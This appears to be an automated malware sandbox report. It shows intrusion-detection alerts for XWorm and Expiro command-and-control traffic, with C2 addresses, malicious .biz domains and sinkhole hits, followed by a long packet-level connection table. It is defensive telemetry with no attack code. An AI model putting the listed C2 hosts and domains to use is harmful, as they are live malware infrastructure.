                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:13.550781+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.849779TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:16.544350+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.849785TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:16.544350+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.849785TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:19.927368+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.849790TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:19.927368+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.849790TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:20.520085+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:20.522968+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:25.548314+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.84980018.246.231.12080TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:26.569235+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.849802TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:26.569235+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.849802TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:32.007656+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:32.009895+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:40.219750+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:40.219750+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:41.663178+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:41.666370+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:43.077139+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:43.079937+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:43.880385+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.8583901.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:47.228047+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:47.232962+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:50.122258+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:50.165460+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:58.632852+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:58.639056+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:01.435276+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.8579931.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:04.039444+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:04.041691+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:04.581923+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.8619891.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:10.054397+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:10.059508+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:10.215574+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:10.215574+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:11.952862+01002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.8507111.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:19.683653+01002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.8576341.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:21.733062+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:21.736445+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:22.898815+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:22.900401+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:28.114246+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.85017118.141.10.10780TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:29.600322+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.8557301.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:32.758382+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:32.760012+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:33.695443+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:33.701299+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:33.756603+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:33.758283+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:33.845956+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:33.848152+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:36.645562+01002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.8621171.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:39.436954+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:40.214322+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:42.648419+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426544905 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426590919 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426608086 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426632881 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426646948 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426736116 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426812887 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426820040 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426861048 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426937103 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426943064 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427087069 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427134991 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427141905 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427182913 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427788019 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427841902 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427862883 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427870035 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427892923 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427915096 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.428647041 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.428706884 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.428769112 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.428821087 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.428877115 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.428925037 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.429658890 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.429717064 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.429779053 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.429828882 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.429951906 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.430015087 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.430614948 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.430668116 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.541659117 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.541785955 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.541811943 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.541862965 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.541981936 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542032957 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542197943 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542243004 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542433977 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542475939 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542484045 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542495966 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542525053 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542556047 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542812109 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542876959 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542996883 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.543046951 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.543277025 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.543348074 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.543548107 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.543601990 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.543719053 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666261911 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666276932 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666315079 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666327953 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666342020 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666348934 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666361094 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666399002 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666412115 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666435003 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666460037 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.667218924 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.667238951 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.667278051 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.667292118 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.667337894 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.668324947 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.772707939 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.772726059 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.772840023 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.772891045 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.772931099 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.772986889 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.773003101 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.773061037 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.773073912 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.773113966 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.773741961 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.773757935 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.773825884 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.773839951 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.773876905 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.775650024 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.775665998 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.775703907 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.775722980 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.775743961 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.775772095 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.776875973 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.776899099 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.776932001 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.776946068 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.776973963 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.777009010 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.777754068 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.777770996 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.777808905 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.777820110 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.777846098 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.777869940 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.778281927 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.778297901 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.778353930 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.778364897 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.778403044 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.778604031 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.778619051 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.778654099 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.890624046 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.891921043 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.891938925 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.892023087 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.892041922 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.892107010 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.892425060 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.892440081 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.892497063 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.892510891 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.892575026 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.893625975 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.893641949 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.893704891 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.893723011 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.893785000 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894092083 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894107103 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894155979 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894166946 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894203901 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894361973 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894377947 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894422054 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894433022 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894471884 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.894484043 CET49707443192.168.2.8188.114.97.3
